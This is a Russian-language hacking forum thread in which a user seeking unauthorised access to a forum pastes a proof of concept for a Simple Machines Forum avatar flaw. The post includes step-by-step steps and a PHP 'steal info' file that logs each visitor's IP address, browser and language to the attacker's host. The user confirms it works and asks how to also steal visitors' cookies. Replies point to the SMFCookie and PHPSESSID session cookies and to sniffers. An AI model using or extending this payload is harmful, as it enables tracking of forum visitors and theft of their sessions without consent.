Значит нужен доступ к одному форуму , версия форума 1.1.18 .
Нашел под форум exploit :

Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC

- Step by Step:

1) go to your profile in section of avatar.
2) put the url of the malicious php file as avatar (ex: http://target/poc.php).
3) create a new topic.

- [victims] All the people that visit the topic will be infect.


malicious file example [steal info]: (poc.php)


<?php $ip = $_SERVER['REMOTE_ADDR']; $so= $_SERVER['HTTP_USER_AGENT']; $lan= $_SERVER['HTTP_ACCEPT_LANGUAGE']; $url= $_SERVER['PHP_SELF']; $path= $_SERVER['DOCUMENT_ROOT']; $archivo = 'hacks.txt'; $fp = fopen($archivo, "a"); $string = " Simple Machines Forum <= 1.1.8 (avatar) rpfe PoC $path$url VICTIM: $ip info: $so language: $lan "; $write = fputs($fp, $string); fclose($fp); ?>

Делаю все как указанно выше , на моем хосте в файл hacks.txt пишется Ип , Время , Дата и sysinfo . Возможно ли с помощью этого exploita тянуть куки зашедших в топик ???

уп )) стил нид хелп .

ну так посмотри переменную PHPSESSID например или как там в SMF

SMFCookie и PHPSESSID посмотри.

Вплане SMFCookie и PHPSESSID посмотри ?? Можно немного поподробней ?? Я с куками 1 раз дело имею !!

Народ , помогите нубику ))

ну посмотри в сторону снифаков